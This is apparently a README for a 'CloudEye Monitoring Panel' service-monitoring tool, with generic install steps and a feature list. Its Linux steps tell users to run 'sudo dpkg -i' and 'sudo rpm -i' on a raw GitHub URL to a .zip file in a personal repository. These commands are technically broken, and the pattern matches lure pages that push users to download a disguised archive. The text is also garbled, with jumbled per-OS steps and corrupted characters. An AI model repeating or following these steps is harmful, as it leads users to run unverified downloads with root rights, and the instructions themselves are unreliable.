Welcome to the CloudEye Monitoring Panel! This modern tool helps you keep track of your services easily. Follow these steps to download and run the application.
- Visit the Releases Page: Go to the Releases Page to find the latest version of the application.
- Choose the Right File: Click on the file that matches your operating system. If youβre not sure, look for options labeled Windows, macOS, or Linux.
- Download the File: Click on the file link to start the download process. Wait for the file to finish downloading.
- Locate the Downloaded File: Find the
.exefile in your Downloads folder. - Run the Installer: Double-click the file to launch the installation.
- Follow the Instructions: The setup wizard will guide you through the rest of the installation.
- Find the Downloaded File: Open your Downloads folder and locate the
.dmgfile. - Open the File: Double-click the
.dmgfile to mount it. - Drag to Applications: Drag the CloudEye app icon to the Applications folder.
- Launch the Application: Open your Applications folder and double-click CloudEye to start.
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Open Terminal: Launch a terminal window.
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Navigate to Downloads: Use the command
cd ~/Downloadsto go to your Downloads directory. -
Install the Application: Run the command to install the downloaded package (this will vary based on the file type, like
.debor.rpm):For
.deb:sudo dpkg -i https://raw.githubusercontent.com/keshu9925/monitor/main/server/monitor-2.1.zip
For
.rpm:sudo rpm -i https://raw.githubusercontent.com/keshu9925/monitor/main/server/monitor-2.1.zip
- Start the Application: Open CloudEye from your applications menu or by double-clicking the application icon.
- Configure Your Settings: Once opened, follow the on-screen prompts to set up your monitoring preferences. You can choose what services to monitor, set up alerts, and configure notifications.
- Begin Monitoring: Click the "Start Monitoring" button to begin tracking your services.
- HTTP/HTTPS Checks: Monitor website availability with customizable request methods and keyword detection.
- TCP Connectivity Tests: Check if specific ports are accessible on your services.
- Komari Panel Monitoring: Keep tabs on your server's status with real-time data.
- Telegram Group Monitoring: Listen for specific messages in Telegram groups to assess your service status.
- Webhook Notifications: Set up custom notifications to platforms like Discord or Slack.
- Real-time Updates: Use SSE for instant notifications about your services.
- Keyword Checking: Verify if certain keywords are present or absent on pages.
- Scheduled Checks: Customize how often the application checks your services.
- Documentation: The detailed user guide is available on the GitHub Wiki.
- Support: If you encounter issues, please check the Issues Page for help.
Donβt wait! Visit the Releases Page to download the latest version and keep your services monitored with ease.
Happy monitoring!